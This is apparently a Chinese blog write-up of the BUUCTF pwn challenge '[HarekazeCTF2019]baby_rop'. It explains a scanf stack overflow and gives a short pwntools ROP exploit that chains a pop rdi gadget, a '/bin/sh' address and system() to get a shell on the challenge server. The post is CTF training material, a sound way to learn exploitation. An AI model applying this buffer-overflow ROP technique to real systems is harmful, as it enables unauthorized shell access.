BUUCTF-PWN-[HarekazeCTF2019]baby_rop

89次阅读
没有评论

共计 321 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-29 14:38,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-[HarekazeCTF2019]baby_rop

IDA

BUUCTF-PWN-[HarekazeCTF2019]baby_rop

scanf 可以溢出

BUUCTF-PWN-[HarekazeCTF2019]baby_rop

查看 string

BUUCTF-PWN-[HarekazeCTF2019]baby_rop

发现 binsh

思路

先覆盖变量 v4,溢出到 rdi,然后带上 binsh 参数调用 system 函数

EXP

from pwn import *

p = remote('node4.buuoj.cn', 25780)

rdi = 0x400683
binsh_addr = 0x601048
sys_addr = 0x400490

payload = flat(b'a' * (0x10 + 8), p64(rdi), p64(binsh_addr), p64(sys_addr))

p.sendline(payload)

p.interactive()

结果

注意:这题的 flag 在 home 下的文件夹 babyrop 里面

BUUCTF-PWN-[HarekazeCTF2019]baby_rop

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-12-06发表,共计321字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)